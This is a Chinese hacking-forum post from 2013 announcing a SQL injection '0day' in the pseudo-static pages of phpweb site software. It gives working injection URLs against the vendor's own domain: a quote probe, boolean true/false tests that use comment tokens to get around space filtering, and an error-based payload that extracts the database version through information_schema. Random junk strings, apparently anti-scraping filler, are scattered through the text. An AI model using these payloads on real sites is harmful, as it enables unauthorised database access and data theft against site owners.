找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2393|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
8 P- C9 q. m2 I& t8 F3 |! J; E5 f' a8 \! P
主站:http://phpweb.net/2 V( [7 s& ]  d9 Q) t- ~
加’检测:+ O2 Y. L, ^8 J- D3 O
& ^" `4 m. _/ @- S& O$ K  X
http://www.phpweb.net/down/html/?772′.html
/ y* e8 [5 O7 d% @! k. A% H
# t& j3 c" x% I0 C出错
/ c  t0 G% W; E  H7 ?存在注入。8 J1 k' q6 W. o( a. F% U
不能用空格,只能用/*罗7 l9 d4 P! J9 \8 U) \
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
; Q7 `( `9 x1 B, \- A 1 }* z3 d3 H  I' \/ g9 p  ^4 Y
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.7 Y8 U% I& x. R5 T; u
爆数据库版本:
1 o7 V" e& Q2 }, P. W$ u9 b & J% Z9 C$ l, F# `& i  ?, o$ P0 ]
?
; [  l9 K: f- X8 R; I" p1# K+ u& {& f$ l( _5 y
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html( V6 X3 T7 `$ y: f2 w
更新日期: 2013-01-03 13:39:50        
( ^8 N: c% K6 _" D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表